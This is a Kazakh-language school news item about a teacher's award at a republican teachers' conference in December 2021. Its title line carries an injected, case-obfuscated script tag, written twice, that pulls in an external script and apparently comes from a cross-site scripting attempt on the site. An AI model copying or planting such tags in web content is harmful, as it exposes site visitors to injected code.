«ҮЗДІК ПЕДАГОГ: БІЛІМ ЖӘНЕ ҒЫЛЫМ,ИННОВАЦИЯЛЫҚ ИДЕЯЛАР»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

30.12.2021

29  желтоқсан күні «BILIM-ÓRKENIETI» ҰИҒЗО ұйымдастыруымен ҚР Министрлік үйінде
«ҮЗДІК ПЕДАГОГ: БІЛІМ ЖӘНЕ ҒЫЛЫМ,ИННОВАЦИЯЛЫҚ ИДЕЯЛАР»РЕСПУБЛИКАЛЫҚ ҒЫЛЫМИ - ТӘЖІРИБЕЛІК КОНФЕРЕНЦИЯСЫ өтті.Сол конференцияға тарих және география пән мұғалімі Шайзан Алия ҚР Тәуелсіздігінің 30  жылдық мерейтойына орай Мемлекет басшысы Қасым-Жомарт  Тоқаевтың "Тәуелсіздік бәрінен қымбат " атты бағдарламалық мақаласын  педагогтар мен  білім алушылардың  арасында кеңінен  насихаттау мақсатында  өткен "Мәртебелі ұстаз-2021" атты  республикалық байқауға қатысып І дәрежелі Диплом, "ҚР Тәуелсіздігіне 30 жыл"  төсбелгісімен марапатталып,  куәлік табыс етілді. Марапатты табыстаған Л.Н. Гумилев атындағы Еуразия ұлттық университеті Еуразиялық зерттеулер кафедрасының профессоры, тарих ғылымдарының докторы М.А. Алпысбес.Сонымен қатар «Bilim-órkenieti» ұлттық инновациялық ғылыми зерттеу
орталығы мектеп директорына “Алғыс хат” табыс етті.

Просмотров: 392


Пікір қосу



Деректерді қолтаңбаға қосу